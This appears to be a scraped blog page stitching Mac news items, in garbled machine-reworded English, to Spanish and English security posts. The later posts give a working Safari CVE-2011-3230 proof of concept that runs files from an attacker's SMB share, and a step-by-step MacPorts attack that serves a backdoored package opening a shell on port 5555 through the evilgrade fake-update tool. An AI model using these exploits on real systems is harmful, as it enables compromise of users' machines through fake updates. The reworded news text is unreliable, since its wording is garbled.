Yahoo Messenger relaunched new features for Mac and Windows

Yahoo Messenger relaunched new features for Mac and Windows

Yahoo was obtained by versatile transporter Verizon for $4.83 billion prior this week, and now the organization has relaunched the Yahoo Messenger application for Mac and Windows PCs.

"Our new stage outfits you with a snappy and basic way to deal with send (and unsend) messages, and in addition photos and vivified GIFs," Hurray expounded on its energy Tumblr site.

The new Yahoo Messenger application accompanies a crisp look and a modest bunch of new elements. Clients will now have the capacity to unsend messages, answer utilizing GIFs and send numerous photographs by basically dragging them into a discussion.

To send a GIF, clients will essentially need to tap the GIF symbol on the lower left-hand side of the discussion. This will raise a GIF web crawler where clients can without much of a stretch search for any GIFs they need to send.

The unsend catch is presumably the best new component on Yahoo Messenger. It permits clients to rapidly withdraw a message, photograph or even GIF that they as of late simply sent.

This is truly valuable particularly for those utilizing Yahoo Messenger to speak with collaborators or customers.

To exploit the components, clients will essentially need to move their mouse over a message, photograph of GIF and snap on the unsend symbol that appears.

Hurray Messenger has been around since 1999, and it has developed throughout the years. Tragically, the mobile phone time arrived and exhibited different distinctive applications that offered the same educating foundation.

With the relaunch of the as good as ever Messenger application, Yahoo is planning to get individuals back to utilizing its informing stage.

The revived Messenger application arrives just about a week prior to the legacy variant of the application for Windows and Mac goes disconnected on Aug. 5, as pointed out by VentureBeat.

Yahoo Messenger relaunched new features for Mac and Windows

How to create an iPhone Wifi Hotspot

How to create an iPhone Wifi Hotspot

A Wifi hotspot transforms the iPhone into a Wifi switch (like the one in your home). The iPhone discharges a Wifi association that your Mac can interface with. The Mac associates with the iPhone utilizing Wifi, and the iPhone interfaces with the web utilizing its 3G/4G cell information association. It's shrewd stuff and a slick trap to know.

Here's the way to make an iPhone into hotspot or Wifi hotspot:

1. Tap Settings and Mobile.

2. Tap Personal Hotspot and set Personal Hotspot to mode On.

4. And then tap on Turn on Wi-Fi and Bluetooth.

5. Tap Wi-Fi Password and enter a reasonable secret word (this can be any watchword you pick, it's not identified with your Apple ID or common Wi-Fi association).

6. Presently check the name of the hotspot recorded under To Connect Using Wi-Fi (we get "iPhone 5s").

7. Click AirPort in top position the Menu bar of your MacBook device and pick the Wi-Fi hotspot (iPhone 5s for our situation).

8. Enter the secret word from Step 4.

That ought to be it. You ought to now have the capacity to peruse the web on your Mac (or Wifi iPad) utilizing the association gave by your iPhone.

Source

Rumor: iPhone 7 roll out 3.5mm Earphone and a Lightning Adapter

Rumor: iPhone 7 roll out 3.5mm EarPods and a Lightning Adapter

Apple iPhone - One of the more reliable bits of gossip, in spite of seeing some pushback as of late, is that the iPhone 7 and iPhone 7 Plus will jettison the 3.5mm earphone jack for running with the Lightning port, or Bluetooth, for earphones.

Presently, as indicated by another report from Mac Otakara, and refering to sources the production talked with at the current year's Computex Taipei, there may be a couple key changes set up. To begin with, the report echoes past bits of gossip, saying that Apple will to be sure drop the 3.5mm earphone jack in its future iPhone models. Notwithstanding, Apple will clearly exclude Lightning-prepared EarPods in the container.

The way things are, this is the first occasion when that something like this has been recommended. Paving the way to this report, the bits of gossip have run with Apple including Lightning earphones right out of the crate, additionally pushing genuinely remote earphones as a different buy, which would interface with the new iPhones by means of Bluetooth.

Might this be able to be an indication that the 3.5mm earphone jack is setting down deep roots, or do you think Apple would really incorporate a connector? On the other hand is the probable result that Apple will incorporate Lightning earphones?

macOS Sierra Update: rearrange third-party menu

macOS Sierra Update: rearrange third-party menu

Apple is at long last giving Mac clients the capacity to modify outsider menu bar things in its forthcoming macOS Sierra overhaul. As of not long ago, we've possessed the capacity to modify Apple's own menu bar things — however not those from different applications.

"Without a doubt, the macOS Sierra beta makes it possible for Mac customers to modify pariah menu bar (NSStatusItems) extra things, and that is to some degree a noteworthy difficulty," illuminates 9to5Mac.

One thing you can't do in macOS Sierra is cover up or handicap those menu bar symbols. In any case, most applications permit you to do this inside their own particular inclinations.

Bartender is a grand application, yet in the meantime it's a waste if you should simply redo your menu bar images. Having the capacity to do this obviously in macOS Sierra is a significant change of Mac that a measure proprietors will welcome.

macOS Sierra will rollout to this fall as a free redesign for perfect Macs. An early beta is as of now accessible for enlisted designers, yet it is not prescribed for essential Macs. It's feasible Apple will offer an open beta when macOS is more steady.

Safari 5.1.1 Old School Ejecución remota PoC (CVE-2011-3230)

El pasado 12 de Octubre Aaron Sigel hizo publico interesante bug (CVE-2011-3230) en la ultima version de Safari < 5.1.1 solo version Mac OS X.

Esta vulnerabilidad como comenta Aaron  “allows you to send any "file:" url to LaunchServices, which will run binaries, launch applications, or open content in the default application, all from a web page.”

El siguiente POC ilustra la vulnerabilidad:

<html> <head> <base href="file://"> <script>  function DoIt() {   alert(document.getElementById("cmdToRun").value);   document.location=document.getElementById("cmdToRun").value;  } </script> </head> <body> <select id="cmdToRun">  <option value="/usr/sbin/netstat">Launch /usr/bin/netstat</option>  <option value="/etc/passwd">Launch /etc/passwd</option>  <option value="/Applications/Utilities/Bluetooth File Exchange.app"> Launch Bluetooth File Exchange.app</option> </select> <br /> <input type=button value="Launch" onclick="DoIt()"> <br /> </body> </html>

Por lo que podemos observar no se pueden pasar argumentos y hay que saber exactamente el path de lo que se necesita ejecutar.

Adicionalmente LaunchServices verifica el bit quarantine con lo cual no es posible ejecutar directamente un binario bajado desde internet.

Modificando un poco el exploit logramos ejecutar un binario que controlemos:

<html> <head> <base href="file://"> </head> <body>     <iframe src="smb://Administrador:X@x.x.x.x/C$"       width="0" height="0" scrolling="auto" frameborder="1" transparency>     </iframe> <script> function sleep(milliSeconds){         var startTime = new Date().getTime(); // get the current time         while (new Date().getTime() < startTime + milliSeconds); // hog cpu } sleep(8000); document.location="/Volumes/C$/infobyte/ls"; </script> </body> </html>

En este ejemplo:
1) Obligamos a montar una partición por SMB, de esta manera podemos adivinar el directorio /Volumes/[NAMESHARE]
2) Luego dejamos un sleep para hacer tiempo hasta que se monte la unidad
3) Por ultimo ejecutamos el binario, en este caso un simple "ls"

Para este ataque se puede utilizar otros protocolos como FTP/AFP

El problema es que un warning pide la confirmacion del usuario para ejecutarlo.

Agregamos el modulo safari.pm a evilgrade para aprovechar esta vulnerabilidad y hacer creer a los usuarios que es una actualizacion.
La ultima version la pueden ver en: https://code.google.com/p/isr-evilgrade/source/list

Lo divertido es que hay file types desconocidos por Mac y estos sin warnings pueden ser ejecutados por el launch services.

El siguiente PoC, utiliza como protocolo FTP y luego ejecuta un PDF
http://www.infobytesec.com/exploit/ISR-safaripoc.html

Imaginemos por ejemplo la combinacion de esta vulnerabilidad con algun file type explosivo.
Excelente old school bug felicitaciones a Aaron Sigel (@diretraversal) por el descubrimiento.

Referencias:
http://vttynotes.blogspot.com/2011/10/cve-2011-3230-launch-any-file-path-from.html
http://support.apple.com/kb/HT5000

Safari 5.1.1 Old School Remote Execution PoC (CVE-2011-3230)

On October 12 Aaron Sigel was published an interesting bug (CVE-2011-3230) in the latest version of Safari version < 5.1.1 (Mac OS X only)

Aaron noticed that  “It allows you to send any 'file:' url to LaunchServices, which will run binaries, launch applications, or open content in the default application, all from a web page.”

The following POC exposes the vulnerability:

<html> <head> <base href="file://"> <script>  function DoIt() {   alert(document.getElementById("cmdToRun").value);   document.location=document.getElementById("cmdToRun").value;  } </script> </head> <body> <select id="cmdToRun">  <option value="/usr/sbin/netstat">Launch /usr/bin/netstat</option>  <option value="/etc/passwd">Launch /etc/passwd</option>  <option value="/Applications/Utilities/Bluetooth File Exchange.app"> Launch Bluetooth File Exchange.app</option> </select> <br /> <input type=button value="Launch" onclick="DoIt()"> <br /> </body> </html>

As we can see above, you can not give arguments to it and you need to know exactly the path it takes to run.

Additionally LaunchServices checks the "quarantine bit" and thus can not directly execute a binary downloaded from the Internet.

Modifying a little exploit we can execute a binary of our possession:

<html> <head> <base href="file://"> </head> <body>     <iframe src="smb://Administrador:X@x.x.x.x/C$"       width="0" height="0" scrolling="auto"   frameborder="1" transparency>     </iframe> <script> function sleep(milliSeconds){         var startTime = new Date().getTime(); // get the current time         while (new Date().getTime() < startTime + milliSeconds); // hog cpu } sleep(8000); document.location="/Volumes/C$/infobyte/ls"; </script> </body> </html>

In this example:
1) We mount an SMB partition, so you can guess the directory /Volumes/[NAMESHARE]
2) Then we sleep for a while until the unit is mounted.
3) Finally run the binary, in this case a simple "ls".

For this attack you can use other protocols such as "FTP / AFP"

The problem is that an alert will pop up asking for user confirmation to execute the binary.

We just added the module safari.pm to evilgrade to take advantage of this vulnerability and make users believe it's an update.

Dowload the last version: https://code.google.com/p/isr-evilgrade/source/list

The funny thing is that there are unknown file types by Mac OS X and these ones without user interaction can be executed by the launch services.

The following PoC uses the FTP service and then open a PDF:
http://www.infobytesec.com/exploit/ISR-safaripoc.html

Imagine for example the combination of this vulnerability with a dangerous file type..
Congratulations for the research to this 'old school' vulnerability Aaron Sigel (@diretraversal).

Reference:
http://vttynotes.blogspot.com/2011/10/cve-2011-3230-launch-any-file-path-from.html
http://support.apple.com/kb/HT5000

Pwning Mac OS X with evilgrade + MacPorts

The idea of this post is to show the flaws in the packages distribution of the project MacPorts for Mac OS X

The MacPorts use:

a) To update your repository rsync server

b) The packages are distributed via http / ftp

c) Before installing a new package it is checked with the MD5/SHA1 in the local repository

To perform the attack we need to do the following tasks:

1) Prepare the rsync server on the attacker's machine (192.168.10.133) with all the files of rsync.macports.org:

mkdir -p /dev/evilgrade/release/ports

mkdir -p /dev/evilgrade/release/base

#Get the files from rsync.macports.org

/usr/bin/rsync -rtzv --delete-after --exclude=/PortIndex* rsync://rsync.macports.org/release/ports/ /dev/evilgrade/release/ports/

/usr/bin/rsync -rtzv --delete-after --exclude=/PortIndex* rsync://rsync.macports.org/release/base/ /dev/evilgrade/release/base/

2) Configure the file /etc/rsyncd.conf:

max connections = 20

log file = /var/log/rsync.log

timeout = 300

[release]

comment = Stuff

path = /dev/evilgrade/release/

read only = yes

list = yes

uid = nobody

gid = nogroup

# auth users = craig

# secrets file = /etc/rsyncd.secrets

hosts allow = 192.168.10.0/24 #change for your subnet

3) Then start the rsync server /etc/init.d/rsync start

4) In this case we will attack the package serf in the category www. The idea is that when you install this package we create a listener shell port 5555

We have to edit the repository file /dev/evilgrade/release/ports/www/serf/Portfile and change checksums md5 with the hash of our payload/agent found in /evilgrade/agent/serf-0.7.2. tar.bz2

You could also prepare the repository for all "Porfiles" point to the same package with the same md5 so any installation which infect the victim port

This agent has a line (132) in Makefile.in to leave a shell at port 5555

4) On the victim machine (192.168.10.42) for this test add in /etc/hosts the following lines or make any forwarding traffic attack :

192.168.10.133 serf.googlecode.com rsync.macports.org

5) Start evilgrade on the attacker machine 192.168.10.133

6) On the victim machine run a "sudo port selfupdate" and then "sudo port install serf"

7) We verify that our attacker is receiving the rsync request by reading the file /var/log/rsync.log

Check what happend in evilgrade:

8) Enjoy your shell!

Download the MacPort agent from http://www.infobytesec.com/down/macportsevilgrade.tar.gz and uncompress it in the evilgrade path.

Remember to keep your systems updated! ;)

Pwning Mac OS X con evilgrade + MacPorts

La idea de este post es demostrar las fallas en la distribución de paquetes en el proyecto MacPorts para sistemas Mac OS X

A grandes rangos el port utiliza:

a) Para la actualización de su repositorio un servidor rsync

b) Los paquetes se distribuyen por http/ftp

c) Antes de instalar un nuevo paquete verifica el md5/sha1 del repositorio local con el nuevo archivo si es valido instala el paquete.

Para realizar el ataque debemos seguir las siguientes tareas:

1) Preparamos el servidor de rsync en el equipo atacante (192.168.10.133) con todo repositorio valido de rsync.macports.org:

mkdir -p /dev/evilgrade/release/ports

mkdir -p /dev/evilgrade/release/base

#Obtenemos la información necesaria

/usr/bin/rsync -rtzv --delete-after --exclude=/PortIndex* rsync://rsync.macports.org/release/ports/ /dev/evilgrade/release/ports/

/usr/bin/rsync -rtzv --delete-after --exclude=/PortIndex* rsync://rsync.macports.org/release/base/ /dev/evilgrade/release/base/

2) Configuramos el archivo/etc/rsyncd.conf:

max connections = 20

log file = /var/log/rsync.log

timeout = 300

[release]

comment = Stuff

path = /dev/evilgrade/release/

read only = yes

list = yes

uid = nobody

gid = nogroup

# auth users = craig

# secrets file = /etc/rsyncd.secrets

hosts allow = 192.168.10.0/24 #cambiar por la subnet correspondiente.

3) Luego levantamos nuestro servidor /etc/init.d/rsync start

4) En este caso vamos a atacar el paquete serf dentro de la categoría www. La idea es que cuando instale este paquete nos deje una shell en el puerto 5555

Tenemos que editar en el repositorio el archivo/dev/evilgrade/release/ports/www/serf/Portfile y cambiar el checksums md5 por el hash de nuestro payload/agente que se encuentra en /evilgrade/agent/serf-0.7.2.tar.bz2

También se podría preparar este repositorio para que todos los Porfiles apunten a un mismo paquete con el mismo md5 con la cual cualquier instalación por port infectaría a la victima

Este agente tiene una línea (132) en el Makefile.in para dejar una shell en el 5555

4) En el equipo víctima (192.168.10.42) para esta prueba agregamos en el /etc/hosts las siguientes lineas o realizamos algún ataque de redireccionamiento de trafico:

192.168.10.133 serf.googlecode.com rsync.macports.org

5) Levantamos el evilgrade en el equipo atacante 192.168.10.133

6) En el equipo victima corremos un “sudo port selfupdate” y luego “sudo port install serf”

7) Verificamos que nuestro atacante este recibiendo el requerimiento por rsync leyendo el archive /var/log/rsync.log

y luego el request en evilgrade:

8) Por ultimo nos conectamos a nuestra shell

Para obtener este obtener el agent y modulo de MacPort bajar el siguiente paquete http://www.infobytesec.com/down/macportsevilgrade.tar.gz descomprimirlo en el raíz de evilgrade.

Recuerden mantener actualizados sus sistemas ;)